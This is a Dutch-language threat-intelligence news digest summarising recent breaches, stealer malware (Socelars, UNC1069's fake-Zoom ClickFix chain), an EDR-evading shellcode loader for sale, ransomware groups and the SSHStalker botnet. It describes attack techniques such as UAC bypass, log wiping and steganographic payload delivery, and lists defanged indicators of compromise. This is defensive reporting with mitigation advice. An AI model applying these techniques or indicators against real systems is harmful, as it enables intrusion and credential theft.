De door deze actoren ingezette ransomware versleutelt bestanden en voegt hierbij de extensie .locked toe aan de bestandsnamen. Tijdens de infectie wordt een losgeldbericht achtergelaten met de bestandsnaam RestoreYourFiles.txt. De dreiging wordt geclassificeerd als cybercriminaliteit en de status van de melding staat momenteel op hangende verificatie. Er is een cryptografische hash (MD5: f0bdb2add62b0196a50e25e45e370cc5) gekoppeld aan de gebruikte malware voor verdere analyse door security-professionals.

De online gaminggemeenschap Toy Battles is in februari 2026 getroffen door een datalek waarbij gegevens van duizend unieke accounts zijn blootgesteld. Bij het incident zijn verschillende soorten gegevens van gebruikers buitgemaakt waaronder e-mailadressen en gebruikersnamen. Daarnaast omvatten de gelekte gegevens IP-adressen en chatberichten die op het platform zijn uitgewisseld.

Na de ontdekking van de inbreuk heeft Toy Battles de betreffende gegevens zelf ingediend bij de verificatiedienst Have I Been Pwned om gebruikers te informeren over de blootstelling. De gegevens zijn op 10 februari 2026 officieel aan de database van deze dienst toegevoegd. Het incident heeft betrekking op het domein toybattles.net en betreft een specifieke set aan persoonlijke en technische informatie van de betrokken communityleden.

Bron:haveibeenpwned.com

In januari 2026 is een datalek vastgesteld bij de Franse non-profitorganisatie Association Nationale des Premiers Secours (ANPS). Gegevens afkomstig van deze organisatie werden op een hackersforum geplaatst, waarna de organisatie het incident zelf heeft gemeld bij het platform Have I Been Pwned. Het lek heeft betrekking op 5.600 unieke e-mailadressen.

Onderzoek door de ANPS wijst uit dat het incident kan worden herleid naar een verouderd softwaresysteem. Naast e-mailadressen zijn ook namen, geboortedata, geboorteplaatsen en aanspreektitels van betrokkenen blootgesteld. De organisatie benadrukt dat er geen medische gegevens, financiële informatie of wachtwoorden zijn gecompromitteerd bij deze inbreuk. Voor Nederlanders die mogelijk betrokken zijn bij internationale non-profitorganisaties of Franse partnerschappen, onderstreept dit voorval het risico van data-expositie via legacy-systemen.

Bron: haveibeenpwned.com

Er is een dataset te koop aangeboden die naar verluidt afkomstig is van Cryptoxscanner, een platform dat wordt gebruikt voor het scannen van cryptocurrency-markten. De aanbieder stelt dat het bestand gegevens bevat van meer dan 13.000 gebruikersrecords. Voor de volledige dataset wordt een bedrag van 300 dollar gevraagd.

De aangeboden informatie omvat diverse persoonlijke en technische gegevens van de geregistreerde gebruikers. Volgens de beschrijving bevat het lek e-mailadressen, volledige namen, gebruikers-ID's en de data waarop de accounts zijn aangemaakt. Indien gebruikers hun Telegram-account hebben gekoppeld, zijn ook de Telegram-ID's en de ingestelde waarschuwingsvoorkeuren voor deze dienst in de dataset opgenomen. Ook de referral-status van accounts maakt deel uit van de aangeboden informatie.

Naast de persoonsgegevens bevat de dataset auth0 ID's, waaronder Google OAuth-tokens. De aanwezigheid van dergelijke authenticatietokens kan risico's met zich meebrengen voor de beveiliging van gekoppelde accounts. Er zijn geen specifieke details bekendgemaakt over de wijze waarop de data is verkregen of over de exacte ouderdom van de records, buiten het feit dat deze nu actief worden verhandeld.

Op het dark web wordt een private shellcode loader te koop aangeboden die specifiek is ontwikkeld om beveiligingsoplossingen zoals antivirussoftware en Endpoint Detection and Response-systemen te omzeilen. De software wordt vanaf 500 dollar verkocht voor een levenslange licentie en is volledig vanaf de basis opgebouwd in de programmeertalen C++, C en ASM. De loader maakt gebruik van indirecte system calls en signature masking om detectie te voorkomen. Een opvallend kenmerk is de levering van shellcode via afbeeldingen op basis van steganografie, waarbij de kwaadaardige code verborgen zit in legitiem ogende bestanden.

De techniek achter deze loader omvat stealth-injectie in stabiele processen en een verborgen grafische interface die legitieme handelingen simuleert om gedragsanalyses te misleiden. Met een omvang van minder dan 40KB is de stub zeer compact. Aanvullende modules bieden functionaliteiten zoals anti-debug-logica en multi-threaded anti-sandbox-mechanismen om analyse door beveiligingsonderzoekers te bemoeilijken. De gehanteerde persistentie-methode zorgt ervoor dat er enkel een afbeeldingsbestand op de harde schijf achterblijft. De verkoper levert bij de verkoop resultaten van zowel scantime- als runtime-scans en biedt aangepaste builds aan voor een beperkt aantal kopers.

Het AI-hackingplatform WormGPT is naar verluidt getroffen door een aanzienlijk datalek waarbij gevoelige informatie van meer dan 19.000 gebruikers op straat is komen te liggen. De gelekte gegevens omvatten e-mailadressen, metadata van betalingen en specifieke abonnementsgegevens van de individuen die gebruikmaakten van de dienst. Dit incident legt bloot dat ook platforms die specifiek zijn ontwikkeld voor kwaadaardige doeleinden kwetsbaar zijn voor beveiligingsincidenten en datalekken.

De impact van dit lek strekt zich verder uit dan enkel het verlies van toegang tot de AI-tool zelf. Door de blootstelling van e-mailadressen en betalingsgegevens wordt de anonimiteit van de gebruikers die het platform voor hackingdoeleinden inzetten doorbroken. Deze koppeling tussen persoonlijke gegevens en het gebruik van een crimineel platform creëert risico's op het gebied van attributie, waarbij activiteiten direct aan individuen kunnen worden gelinkt. Daarnaast kunnen deze gegevens door andere actoren worden misbruikt voor afpersing, vergelding of gerichte aanvallen op de getroffen gebruikers.

Een gevaarlijke informatie-stelende malware genaamd Socelars richt zich actief op Windows-systemen om gevoelige authenticatiegegevens te verzamelen, met een bijzondere focus op Facebook Ads Manager-accounts en sessiecookies. In tegenstelling tot traditionele malware die onmiddellijke systeemschade veroorzaakt, opereert Socelars stil op de achtergrond en verandert het geïnfecteerde machines in gateways voor accountovername en financiële fraude.

Socelars is geavanceerde spyware die is ontworpen om geauthenticeerde sessiegegevens te verzamelen in plaats van computersystemen te ontwrichten. De malware richt zich specifiek op in browsers opgeslagen sessiecookies van platforms zoals Facebook en Amazon, waardoor aanvallers wachtwoordbeveiligingen kunnen omzeilen en, in sommige gevallen, zelfs multi-factor authenticatie. Dit maakt het bijzonder bedreigend voor bedrijven die afhankelijk zijn van advertentieplatforms en e-commerce accounts, waar gestolen sessies snel kunnen worden omgezet in geld voordat ze worden ontdekt.

Volgens ANY.RUN analyse vermomt de malware zich meestal als legitieme PDF-reader software en wordt verspreid via valse websites die zijn ontworpen om betrouwbaar te lijken. Eenmaal geïnstalleerd verzamelt Socelars stilletjes computerinformatie, steelt actieve browsersessies en bereidt gestolen gegevens voor exfiltratie naar door aanvallers gecontroleerde servers.

Socelars voert zijn aanval uit in drie verschillende fasen. Eerst voert het systeemherkenning uit door computernamen en Machine GUID's uit het register te verzamelen en door geïnstalleerde talen en systeemcertificaten te controleren. De malware omzeilt vervolgens User Account Control via COM auto-verhoging, waardoor verhoogde privileges worden verkregen zonder beveiligingswaarschuwingen te activeren.

In de tweede fase verzamelt Socelars authenticatiegegevens van webbrowsers. Het opent browseropslag en extraheert actieve sessiecookies die geldig blijven, zelfs nadat wachtwoorden zijn gewijzigd. De malware richt zich primair op Google Chrome en Mozilla Firefox door cookies te openen die zijn opgeslagen in SQLite-databases. Deze gestolen sessiegegevens bieden aanvallers kant-en-klare toegang tot bedrijfsaccounts zonder traditionele credential diefstal. Ten slotte exfiltreert Socelars verzamelde gegevens naar externe servers die worden gecontroleerd door cybercriminelen. Aanvallers kunnen vervolgens frauduleuze reclamecampagnes lanceren, marketingbudgetten leegzuigen of gecompromitteerde bedrijfsaccounts doorverkopen op underground markten.

Organisaties die sterk afhankelijk zijn van digitale reclame en e-commerce lopen het grootste risico. Marketing- en reclamegedreven bedrijven die Facebook Ads Manager gebruiken zijn primaire doelwitten, omdat gecompromitteerde accounts directe toegang bieden tot hun reclamebudgetten. Digitale bureaus die meerdere klantadvertentieaccounts beheren zijn bijzonder kwetsbaar, omdat een enkel geïnfecteerd werkstation talloze klantaccounts tegelijkertijd in gevaar kan brengen. Kleine en middelgrote ondernemingen lopen ook een verhoogd risico vanwege lichtere beveiligingscontroles en minder uitgebreide trainingprogramma's voor werknemers.

Organisaties kunnen zich verdedigen tegen Socelars door meerdere beveiligingslagen te gebruiken, waaronder ANY.RUN malware analyse om verdachte bestanden veilig te analyseren en kwaadaardig gedrag vroegtijdig te detecteren. Implementeer hardware-gebaseerde authenticatietokens zoals YubiKey of FIDO-sleutels die sessiecookie diefstal via proxy methoden voorkomen. Implementeer voorwaardelijke toegangsregels die logins alleen toestaan vanaf vertrouwde, ingeschreven apparaten. Configureer browsers om regelmatig permanente cookies te verwijderen en de geldigheidsduur van cookies te minimaliseren. Train werknemers om phishing pogingen te identificeren en het downloaden van software van niet-vertrouwde bronnen te vermijden. Houd alle webbrowsers up-to-date en gebruik threat intelligence feeds om bekende Socelar infrastructuur te identificeren en te blokkeren.

Bron: ANY.RUN

De Noord-Koreaanse dreigingsactor UNC1069 is actief in de cryptocurrency-sector om gevoelige data van Windows- en macOS-systemen te stelen, met als doel financiële diefstal te faciliteren. Volgens Google Mandiant onderzoekers Ross Inman en Adrian Hernandez maakt de inbraak gebruik van social engineering via een gecompromitteerd Telegram-account, een valse Zoom-meeting, een ClickFix-infectievector en mogelijk AI-gegenereerde video’s om het slachtoffer te misleiden.

UNC1069, actief sinds april 2018, staat bekend om social engineering campagnes voor financieel gewin, waarbij valse meeting invites worden gebruikt en men zich voordoet als investeerders van gerenommeerde bedrijven op Telegram. De groep staat ook bekend onder de namen CryptoCore en MASAN.

Uit een rapport van Google Threat Intelligence Group (GTIG) van november 2025 bleek al dat de dreigingsactor generatieve AI-tools zoals Gemini gebruikt om lokaasmateriaal en andere berichten te produceren, gerelateerd aan cryptocurrency, om zo social engineering campagnes te ondersteunen. De groep probeerde ook Gemini te misbruiken om code te ontwikkelen voor het stelen van cryptocurrency en deepfake-afbeeldingen en video's te gebruiken om een backdoor genaamd BIGMACHO te verspreiden, die werd vermomd als een Zoom software development kit (SDK).

Sinds 2023 is de groep verschoven van spear-phishing technieken en traditionele finance (TradFi) targeting naar de Web3 industrie, zoals centralized exchanges (CEX), software ontwikkelaars bij financiële instellingen, high-tech bedrijven en personen bij venture capital fondsen.

In de meest recente inbraak, gedocumenteerd door de dreigingsanalyse-divisie van de techgigant, heeft UNC1069 zeven unieke malware families ingezet, waaronder SILENCELIFT, DEEPBREATH en CHROMEPUSH. Het begint allemaal wanneer een slachtoffer via Telegram wordt benaderd door de dreigingsactor, die zich voordoet als venture capitalist of gebruik maakt van gecompromitteerde accounts van entrepreneurs en startup founders. Zodra contact is gelegd, gebruikt de dreigingsactor Calendly om een meeting van 30 minuten in te plannen.

De meetinglink leidt het slachtoffer naar een valse website die zich voordoet als Zoom ("zoom.uswe05[.]us"). In sommige gevallen worden de meetinglinks direct via Telegram gedeeld, waarbij de hyperlink-functie wordt gebruikt om de phishing-URL's te verbergen. Zodra het slachtoffer op de link klikt, zien ze een valse video-oproepinterface die Zoom nabootst en hen aanspoort om hun camera in te schakelen en hun naam in te voeren. Nadat het doelwit aan de meeting deelneemt, wordt een scherm getoond dat op een echte Zoom-meeting lijkt.

Er wordt vermoed dat de video's deepfakes zijn of echte opnames die stiekem zijn gemaakt van andere slachtoffers die eerder in dezelfde val zijn getrapt. Kaspersky volgt dezelfde campagne onder de naam GhostCall, die in oktober 2025 in detail werd gedocumenteerd. De webcam-beelden van slachtoffers werden opgenomen, geüpload naar door de aanvallers gecontroleerde infrastructuur en hergebruikt om andere slachtoffers te misleiden, waardoor ze dachten dat ze deelnamen aan een echte live call. Wanneer de video replay eindigt, toont de pagina het profiel van de gebruiker, waardoor de illusie van een live call wordt gehandhaafd.

De aanval gaat verder wanneer het slachtoffer een valse foutmelding krijgt over een vermeend audioprobleem, waarna ze worden gevraagd een ClickFix-stijl troubleshooting commando te downloaden en uit te voeren om het probleem op te lossen. In het geval van macOS leiden de commando's tot de levering van een AppleScript dat een kwaadaardige Mach-O binary op het systeem plaatst, genaamd WAVESHAPER. Dit C++ executable is ontworpen om systeeminformatie te verzamelen en een Go-gebaseerde downloader te verspreiden met de codenaam HYPERCALL, die vervolgens wordt gebruikt om extra payloads te leveren:

- Een Golang backdoor component genaamd HIDDENCALL, die hands-on keyboard toegang geeft tot het gecompromitteerde systeem en een Swift-gebaseerde data miner genaamd DEEPBREATH inzet.

- Een tweede C++ downloader genaamd SUGARLOADER, die wordt gebruikt om CHROMEPUSH in te zetten.

- Een minimalistische C/C++ backdoor genaamd SILENCELIFT, die systeeminformatie naar een command-and-control (C2) server stuurt.

DEEPBREATH is in staat om de Transparency, Consent, and Control (TCC) database van macOS te manipuleren om toegang tot het bestandssysteem te krijgen, waardoor het iCloud Keychain credentials en data van Google Chrome, Brave, Microsoft Edge, Telegram en de Apple Notes applicatie kan stelen. Net als DEEPBREATH fungeert CHROMEPUSH ook als een data stealer, alleen is het geschreven in C++ en wordt het ingezet als een browser extensie voor Google Chrome en Brave browsers, vermomd als een tool voor het offline bewerken van Google Docs. Het heeft ook de mogelijkheid om toetsaanslagen te registreren, gebruikersnamen en wachtwoorden te observeren en browser cookies te extraheren.

De hoeveelheid tooling die op een enkele host wordt ingezet, duidt op een vastberaden poging om credentials, browser data en sessie tokens te verzamelen om financiële diefstal te faciliteren. Hoewel UNC1069 zich doorgaans richt op cryptocurrency startups, software ontwikkelaars en venture capital firms, markeert de inzet van meerdere nieuwe malware families naast de bekende downloader SUGARLOADER een significante uitbreiding van hun mogelijkheden.

Bron: Google Mandiant

Ondanks waarschuwingen over een nieuwe ransomware genaamd Sicarii, blijkt uit onderzoek dat er geen bewijs is gevonden van een dergelijke ransomware. Beveiligingsonderzoekers hebben de beweringen onderzocht en geconcludeerd dat de vermeende Sicarii ransomware waarschijnlijk een hoax is of een verkeerde interpretatie van andere cyberdreigingen.

Het onderzoeksteam van Check Point Research heeft diverse bronnen geanalyseerd, waaronder dark web forums, social media en security intelligence platforms, maar geen concrete aanwijzingen gevonden die het bestaan van de Sicarii ransomware bevestigen. Er zijn geen slachtoffers gemeld, geen losgeldeisen gepubliceerd en geen malware samples geüpload die aan de vermeende ransomware kunnen worden toegeschreven.

De initiële waarschuwingen over Sicarii ransomware circuleerden voornamelijk via minder bekende security blogs en social media kanalen, waardoor de informatie moeilijk te verifiëren was. Het onderzoeksteam vermoedt dat de verwarring mogelijk is ontstaan door een verkeerde interpretatie van bestaande ransomware varianten of door een poging tot desinformatie.

Hoewel de Sicarii ransomware vooralsnog niet lijkt te bestaan, benadrukt Check Point Research het belang van waakzaamheid en proactieve beveiligingsmaatregelen. Organisaties worden geadviseerd om hun security awareness programma's te blijven updaten, regelmatige back-ups te maken en hun systemen te patchen tegen bekende kwetsbaarheden.

Daarnaast adviseert Check Point Research om informatie over nieuwe dreigingen altijd kritisch te beoordelen en te verifiëren voordat er actie wordt ondernomen. Het blindelings vertrouwen op onbevestigde berichten kan leiden tot onnodige paniek en een verkeerde allocatie van resources.

Het onderzoeksteam blijft de ontwikkelingen op het gebied van ransomware nauwlettend volgen en zal nieuwe bevindingen publiceren zodra deze beschikbaar zijn. Het is essentieel om een gebalanceerde benadering te hanteren, waarbij enerzijds alertheid wordt betracht en anderzijds kritisch wordt omgegaan met onbewezen beweringen.

Bron: Check Point Research

De ransomware-industrie blijft evolueren met nieuwe dreigingsactoren die onconventionele tactieken toepassen. Coinbase Cartel verscheen in september 2025 en claimde al snel 14 slachtoffers in de eerste maand van operatie. Anders dan traditionele ransomwaregroepen, richt deze dreigingsactor zich uitsluitend op data-exfiltratie zonder systemen te versleutelen, wat een verschuiving in cybercriminele strategieën vertegenwoordigt. Deze aanpak maakt aanvallen stiller en sneller uit te voeren, terwijl de hefboomwerking voor losgeld behouden blijft. Slachtoffers krijgen een simpel ultimatum: betalen om gestolen data terug te krijgen of toekijken hoe het publiekelijk wordt gepubliceerd.

De groep richt zich op organisaties in verschillende sectoren, met inkomsten variërend van miljoenen tot honderden miljarden dollars. Bitdefender-analisten identificeerden Coinbase Cartel als een van de top 10 ransomwaregroepen in september en december 2025, met meer dan 60 slachtoffers in de eerste maanden. De gezondheidszorg, technologie en transportindustrie zijn goed voor meer dan de helft van de doelwitten van de groep, waarbij zorginstellingen in de Verenigde Arabische Emiraten bijzonder zwaar getroffen worden. De focus van de groep op zorginstellingen in de VAE roept vragen op over de onderliggende motivaties. Hoewel financieel gewin primair lijkt, suggereert de geconcentreerde targeting van 10 zorginstellingen in één maand potentiële geopolitieke overwegingen, mogelijk gericht op het verstoren van de economie van de VAE.

Coinbase Cartel gebruikt verschillende methoden om toegang te krijgen tot doelsystemen. Social engineering blijft een primaire vector, naast ondersteuning van Initial Access Brokers die pre-gecompromitteerde inloggegevens leveren. De groep verwerft ook blootgestelde inloggegevens via verschillende ondergrondse kanalen. Eenmaal binnen een netwerk gebruiken aanvallers administratieve accounts om systeeminstellingen te manipuleren en te knoeien met logbestanden, waardoor de kans op detectie afneemt. Data van belang wordt systematisch geëxfiltreerd voordat de groep de namen van slachtoffers publiceert op haar dataleksite. Slachtoffers krijgen 48 uur de tijd om te reageren via een aangewezen chatinterface, gevolgd door 10 dagen om Bitcoin-betalingen in te dienen of te onderhandelen over losgeldvoorwaarden. De veilingspagina van Coinbase Cartel toont de infrastructuur van de groep voor het te gelde maken van gestolen data via meerdere kanalen.

De groep opereert onafhankelijk zonder gebruik te maken van het Ransomware-as-a-Service-model, maar werft cybercriminelen rechtstreeks aan. Afgelopen herfst vroegen ze om zero-day exploits met een budget van meer dan $2 miljoen, wat aanzienlijke financiële middelen en ambities aantoont. Organisaties zouden multi-factor authenticatie moeten afdwingen voor alle accounts, vooral administratieve. Regelmatig patchbeheer voorkomt kwetsbaarheden die aanvallers exploiteren voor initiële toegang. Aangezien Coinbase Cartel geen data versleutelt, beschermt het onderhouden van veilige back-ups tegen datamanipulatie. Het maken van inventarissen van kritieke data helpt bij het identificeren van gevoelige informatie die extra bescherming vereist. Threat intelligence-oplossingen bieden bewustzijn van evoluerende tactieken, terwijl managed detection and response-diensten snelle incidentdetectie en responsmogelijkheden bieden.

Bron: Bitdefender

Cybercriminelen richten zich op de bruiloftindustrie met een geavanceerde phishingcampagne waarbij stealer malware wordt verspreid via nagemaakte Microsoft Teams-uitnodigingen. De aanvallers maken gebruik van gecompromitteerde e-mailaccounts van legitieme bedrijven om vertrouwen te wekken, voordat ze de malware versturen.

De aanvallers doen zich voor als juridische professionals en versturen e-mails vanaf het domein czimmerman@craigzlaw[.]com, dat is gekoppeld aan The Law Offices of Craig Zimmerman, een echt bedrijf dat consumenten beschermt. De e-mails bevatten realistische details zoals trouwdatums, aantal gasten en locaties, om de communicatie tussen leveranciers te imiteren.

Na de e-mailwisseling ontvangen de slachtoffers een valse Teams-link (https://teams.microsoft.com/l/meet/47018czL7LJ5PZQ6Cy) met het verzoek om een videogesprek te voeren voor "optimale videokwaliteit". Deze tactiek maakt misbruik van het vertrouwen in samenwerkingstools, in een sector waar de druk hoog is. Microsoft Security waarschuwde op LinkedIn dat dergelijke aanvallen zeer overtuigend lijken en niet snel worden opgemerkt. Het misbruik van Teams voor de verspreiding van malware via chats is sinds 2022 toegenomen.

Het klikken op de link leidt door naar ussh[.]life/connect/teamsfinal/9/windows, een kwaadaardige site die zich voordoet als een Teams-downloadpagina. Gebruikers worden aangespoord om uitvoerbare bestanden voor Windows te downloaden, inclusief een systeemreferentieprompt. Analyse toont aan dat de uitvoerbare bestanden waarschijnlijk credentials, browsergegevens en sessietokens stelen na infectie.

De site gebruikt social engineering en imiteert de officiële Microsoft-huisstijl met prompts als "Need help? System reference." De downloads omzeilen antivirussoftware door middel van obfuscatie, een techniek die vaak wordt gebruikt bij info-stealers, zoals in DarkGate-campagnes via Teams. Na de uitvoering wordt data geëxfiltreerd naar de command-and-control server van de aanvallers, waardoor accountovernames mogelijk worden voor verdere phishing.

De bruiloft-gerelateerde lokmiddelen zijn vergelijkbaar met Android stealers zoals Tria, die uitnodigingen gebruiken om SMS-berichten en e-mails te stelen, maar deze Windows-variant richt zich op planners die desktops gebruiken.

Indicatoren van Compromissie (IOC's):

* E-mail: czimmerman@craigzlaw[.]com (gecompromitteerd legitiem domein)

* Phishing URL: https://teams.microsoft.com/l/meet/47018czL7LJ5PZQ6Cy

* Malware host: ussh[.]life/connect/teamsfinal/9/windows

* Fake code: fr6c (embedded in redirect)

Het wordt aangeraden deze IOC's te blokkeren op firewalls en EDR te gebruiken om afwijkend Teams-verkeer te scannen. De doelwitten zijn Amerikaanse bruiloftleveranciers, waarbij gebruik wordt gemaakt van seizoensgebonden drukte. De gecompromitteerde e-mails van advocaten suggereren een initiële inbreuk via phishing of credential stuffing op M365-accounts. Slachtoffers lopen het risico op datalekken die de PII, betalingen en contracten van klanten blootleggen.

Het is belangrijk om de domeinen van afzenders te verifiëren en met de muis over Teams-links te bewegen voordat erop wordt geklikt. Schakel Microsoft 365 ATP in voor toegangsbeperkingen van externe partijen. Train medewerkers op vishing via valse telefoongesprekken. Gebruik wachtwoordloze authenticatie en controleer op ongebruikelijke downloads van samenwerkingstools. Bruiloftbedrijven zouden de communicatie met leveranciers moeten segmenteren tot alleen e-mail.

Bron: Microsoft

Cisco Talos heeft recentelijk een nieuwe dreigingsactor ontdekt, UAT-9921, die VoidLink in campagnes gebruikt. De activiteiten van deze actor gaan mogelijk terug tot 2019, zelfs zonder VoidLink. De VoidLink compile-on-demand functie legt de basis voor AI-gestuurde aanval frameworks, die on-demand tools kunnen creëren voor hun operators. Cisco Talos heeft duidelijke indicaties dat er ook implants bestaan voor Windows, met de mogelijkheid om plugins te laden.

UAT-9921 maakt gebruik van gecompromitteerde hosts om VoidLink command and control (C2) te installeren, die vervolgens worden gebruikt om scanning activiteiten te lanceren, zowel intern als extern aan het netwerk. Cisco Talos schat in dat deze dreigingsactor kennis heeft van de Chinese taal, gebaseerd op de taal van het framework, code commentaren en code planning gedaan met behulp van de AI-enabled IDE. Talos schat met hoge zekerheid in dat UAT-9921 servers compromitteert met behulp van vooraf verkregen credentials of door het exploiteren van Java serialization vulnerabilities, met name het Apache Dubbo project. Er werden ook indicaties gevonden van mogelijke initiële compromissen via kwaadaardige documenten, maar er werden geen samples verkregen.

Na de compromittatie activiteiten zet UAT-9921 de VoidLink implant in, waardoor de dreigingsactor zijn aanwezigheid en de VoidLink C2 kan verbergen. Om nieuwe doelen te vinden en laterale bewegingen uit te voeren, zet UAT-9921 een SOCKS-server in op zijn gecompromitteerde servers, die wordt gebruikt door FSCAN om interne reconnaissance uit te voeren. UAT-9921 lijkt zich te richten op de technologiesector, maar er zijn ook slachtoffers uit de financiële dienstverlening gezien.

Gezien VoidLink’s auditability en oversight features, is het vermeldenswaardig dat Talos de mogelijkheid niet kan uitsluiten dat deze activiteit deel uitmaakt van red team oefeningen, zelfs al UAT-9921 activiteit het gebruik van exploits en vooraf verkregen credentials omvat.

Bron: Cisco Talos | Bron 2: cisco.com | Bron 3: research.checkpoint.com | Bron 4: sysdig.com | Bron 5: isovalent.com

Check Point Research heeft een rapport gepubliceerd waarin staat dat cybercriminelen steeds vaker gebruikmaken van AI-tools om hun aanvallen uit te voeren. Het rapport, genaamd "Cyber Security Report 2026", beschrijft hoe AI wordt ingezet voor het automatiseren van phishing-campagnes, het ontwikkelen van malware en het kraken van wachtwoorden.

Volgens het rapport maken cybercriminelen gebruik van AI-tools zoals ChatGPT om overtuigendere phishing-mails te genereren. Deze AI-gegenereerde e-mails zijn vaak moeilijk te onderscheiden van legitieme e-mails, waardoor ze effectiever zijn in het misleiden van slachtoffers. Daarnaast worden AI-tools gebruikt om malware te ontwikkelen die moeilijker te detecteren is door antivirussoftware. De AI kan de code van de malware aanpassen om detectie te voorkomen.

Het rapport waarschuwt ook voor het gebruik van AI bij het kraken van wachtwoorden. AI-tools kunnen worden gebruikt om complexe wachtwoorden te raden, waardoor het voor cybercriminelen gemakkelijker wordt om toegang te krijgen tot accounts. Check Point Research adviseert bedrijven en individuen om sterke, unieke wachtwoorden te gebruiken en om multi-factor authenticatie in te schakelen om hun accounts te beschermen.

Het rapport benadrukt de noodzaak voor cybersecurity-professionals om op de hoogte te blijven van de nieuwste ontwikkelingen op het gebied van AI en om proactieve maatregelen te nemen om zich te beschermen tegen AI-gestuurde cyberaanvallen.

Bron: Check Point | Bron 2: checkpoint.com

Cybersecurity onderzoekers hebben details onthuld over een nieuwe botnet operatie genaamd SSHStalker, die gebruik maakt van het Internet Relay Chat (IRC) communicatieprotocol voor command-and-control (C2) doeleinden. Volgens cybersecuritybedrijf Flare combineert de toolset stealth helpers met Linux exploitatie uit een oudere periode. Naast log cleaners (utmp/wtmp/lastlog tampering) en rootkit-achtige artefacten, bevat de toolset een back-catalogus van Linux 2.6.x-era exploits (2009–2010 CVE's). Deze zijn minder waardevol tegen moderne stacks, maar blijven effectief tegen vergeten infrastructuur en langdurige legacy omgevingen.

SSHStalker combineert IRC botnet mechanismen met een geautomatiseerde mass-compromise operatie die een SSH scanner en andere scanners gebruikt om gevoelige systemen te co-opteren in een netwerk en in te schrijven in IRC kanalen. Anders dan andere campagnes die dergelijke botnets gebruiken voor distributed denial-of-service (DDoS) aanvallen, proxyjacking, of cryptocurrency mining, is vastgesteld dat SSHStalker persistente toegang behoudt zonder follow-on post-exploitatie gedrag. Dit afwijkende gedrag doet vermoeden dat de gecompromitteerde infrastructuur wordt gebruikt voor staging, testen, of strategische toegang voor toekomstig gebruik.

Een kerncomponent van SSHStalker is een Golang scanner die scant op poort 22 voor servers met open SSH om zijn bereik uit te breiden op een worm-achtige manier. Ook worden er payloads gedropt, waaronder varianten van een IRC-gecontroleerde bot en een Perl file bot die verbinding maakt met een UnrealIRCd IRC Server, zich aansluit bij een controlekanaal, en wacht op commando's die het in staat stellen om flood-style traffic aanvallen uit te voeren en de bots te commanderen. De aanvallen worden gekenmerkt door de uitvoering van C program files om SSH verbindingslogs te cleanen en sporen van kwaadaardige activiteit uit logs te wissen om forensische zichtbaarheid te verminderen. De malware toolkit bevat een "keep-alive" component die ervoor zorgt dat het hoofd malware proces binnen 60 seconden opnieuw wordt gelanceerd als het wordt beëindigd door een security tool.

SSHStalker is opmerkelijk vanwege het combineren van mass compromise automatisering met een catalogus van 16 verschillende kwetsbaarheden die de Linux kernel beïnvloeden, waarvan sommige teruggaan tot 2009. Enkele van de kwetsbaarheden die in de exploit module worden gebruikt zijn CVE-2009-2692, CVE-2009-2698, CVE-2010-3849, CVE-2010-1173, CVE-2009-2267, CVE-2009-2908, CVE-2009-3547, CVE-2010-2959, en CVE-2010-3437.

Het onderzoek van Flare naar de staging infrastructuur die is geassocieerd met de dreigingsactor heeft een uitgebreide repository van open-source offensive tooling en eerder gepubliceerde malware samples aan het licht gebracht, waaronder rootkits om stealth en persistentie te faciliteren, cryptocurrency miners, en een Python script dat een binary uitvoert genaamd "website grabber" om blootgestelde Amazon Web Services (AWS) geheimen van doelwit websites te stelen. Ook werd EnergyMech gevonden, een IRC bot die C2 en remote command execution mogelijkheden biedt.

Er wordt vermoed dat de dreigingsactor achter de activiteit van Roemeense afkomst is, gezien de aanwezigheid van Roemeense nicknames, slang patronen, en naming conventions binnen IRC kanalen en configuratie wordlists. De operationele fingerprint vertoont sterke overeenkomsten met die van een hacking groep bekend als Outlaw (aka Dota).

Volgens Flare richt SSHStalker zich niet op de ontwikkeling van nieuwe exploits, maar toont het operationele controle door middel van volwassen implementatie en orkestratie, door voornamelijk C te gebruiken voor core bot en low-level componenten, shell voor orkestratie en persistentie, en beperkt Python en Perl gebruik voornamelijk voor utility of ondersteunende automatiseringstaken binnen de aanvalsketen en het runnen van de IRCbot. De dreigingsactor ontwikkelt geen zero-days of nieuwe rootkits, maar toont sterke operationele discipline in mass compromise workflows, infrastructuur recycling, en long-tail persistentie in heterogene Linux omgevingen.

Bron: Flare | Bron 2: nvd.nist.gov

Er is een nieuwe ransomwaregroep ontdekt die opereert onder de naam BlackField. De identificatie van deze groep wijst op een nieuwe speler in het ecosysteem van cybercriminaliteit. Hoewel de groep reeds verschillende slachtoffers lijkt te hebben geclaimd, is de bijbehorende Data Leak Site momenteel onbereikbaar.

De activiteiten van BlackField worden nauwlettend gevolgd nu de groep zich manifesteert in het dreigingslandschap. Ondanks de meldingen over gemaakte slachtoffers bemoeilijkt de offline status van de lekwebsite op dit moment het inzicht in de specifieke omvang van de operaties en de identiteit van de getroffen organisaties.

Op cybercriminele fora vindt momenteel een veiling plaats waarbij admin-, shell- en database-toegang tot een internationale e-commerce winkel wordt aangeboden. De betreffende website, die op WordPress draait, heeft een gemiddelde orderwaarde van 601,91 dollar. Uit de verstrekte gegevens blijkt dat de webshop in januari 412 bestellingen verwerkte, waarvan 351 via betaalkaarten en 42 via cryptovaluta. In de maand februari staat de teller tot nu toe op 139 bestellingen, verdeeld over 109 kaartbetalingen en 23 cryptotransacties.

Er is bij de webshop een zogeheten payment card redirect tap actief, waarbij sprake is van 100 procent unieke bestellingen. Dit wijst op het onderscheppen van betalingsgegevens tijdens het afrekenproces. De veiling voor de volledige toegang tot de systemen start bij een bedrag van 1.000 dollar. Voor een direct akkoord, de zogenaamde blitz-prijs, wordt een bedrag van 2.500 dollar gevraagd.

Cyberweerbaarheid omvat het vermogen om bedreigingen te anticiperen, actieve aanvallen te weerstaan, snel op incidenten te reageren en operaties te herstellen met minimale verstoring. Moderne cyberdreigingen blijven nieuwe uitdagingen introduceren, waardoor het niet langer een vraag is óf een beveiligingsincident zal plaatsvinden, maar wanneer. Trends hebben in de loop der jaren aangetoond dat traditionele reactieve beveiligingsbenaderingen ontoereikend zijn om zich te verdedigen tegen moderne cyberdreigingen. Om gelijke tred te houden met voortdurend evoluerende cyberdreigingen, moeten organisaties proactieve strategieën aannemen die gericht zijn op cyberweerbaarheid.

